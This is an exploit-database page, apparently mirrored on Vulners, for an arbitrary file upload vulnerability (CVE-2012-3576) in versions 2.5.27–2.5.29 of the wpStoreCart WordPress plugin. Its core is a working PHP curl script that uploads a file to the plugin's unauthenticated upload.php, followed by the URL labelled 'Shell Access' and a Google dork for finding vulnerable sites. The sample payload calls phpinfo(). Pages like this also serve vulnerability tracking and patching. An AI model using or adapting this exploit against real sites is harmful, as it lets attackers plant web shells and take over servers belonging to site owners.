Lucene search
+L

WordPress Plugin wpStoreCart 2.5.27-2.5.29 - Arbitrary File Upload

🗓️ 08 Jun 2012 00:00:00Reported by Sammy FORGITType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 54 Views

WordPress Plugin wpStoreCart 2.5.27-2.5.29 Arbitrary File Upload vulnerability descriptio

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2012-3576
8 Jun 201200:00
circl
cve
CVE
CVE-2012-3576
16 Jun 201200:00
cve
cvelist
Cvelist
CVE-2012-3576
16 Jun 201200:00
cvelist
dsquare
Dsquare
WordPress wpStoreCart 2.5.29 File Upload
25 Jun 201200:00
dsquare
nvd
NVD
CVE-2012-3576
16 Jun 201200:55
nvd
openvas
OpenVAS
WordPress wpStoreCart Plugin 'upload.php' Arbitrary File Upload Vulnerability
17 Jul 201200:00
openvas
patchstack
Patchstack
WordPress WPStoreCart Plugin 2.5.27 - 2.5.29 - Arbitrary File Upload
8 Jun 201200:00
patchstack
prion
Prion
Unrestricted file upload
16 Jun 201200:55
prion
wpvulndb
WPVulnDB
wpStoreCart 2.5.27-2.5.29 - Arbitrary File Upload
1 Aug 201400:00
wpvulndb
##################################################
# Description : Wordpress Plugins - wpStoreCart Arbitrary File Upload
Vulnerability
# Version : 2.5.27 - 2.5.29
# Link : http://wordpress.org/extend/plugins/wpstorecart/
# Plugins : http://downloads.wordpress.org/plugin/wpstorecart.2.5.29.zip
# Date : 03-06-2012
# Google Dork : inurl:/wp-content/plugins/wpstorecart/
# Author : Sammy FORGIT - sam at opensyscom dot fr -
http://www.opensyscom.fr
##################################################


Exploit :

PostShell.php
<?php

$uploadfile="lo.php";
$ch =
curl_init("http://www.exemple.com/wordpress/wp-content/plugins/wpstorecart/php/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
         array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>

Shell Access :
http://www.exemple.com/wordpress/wp-content/uploads/wpstorecart/lo.php

lo.php
<?php
phpinfo();
?>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation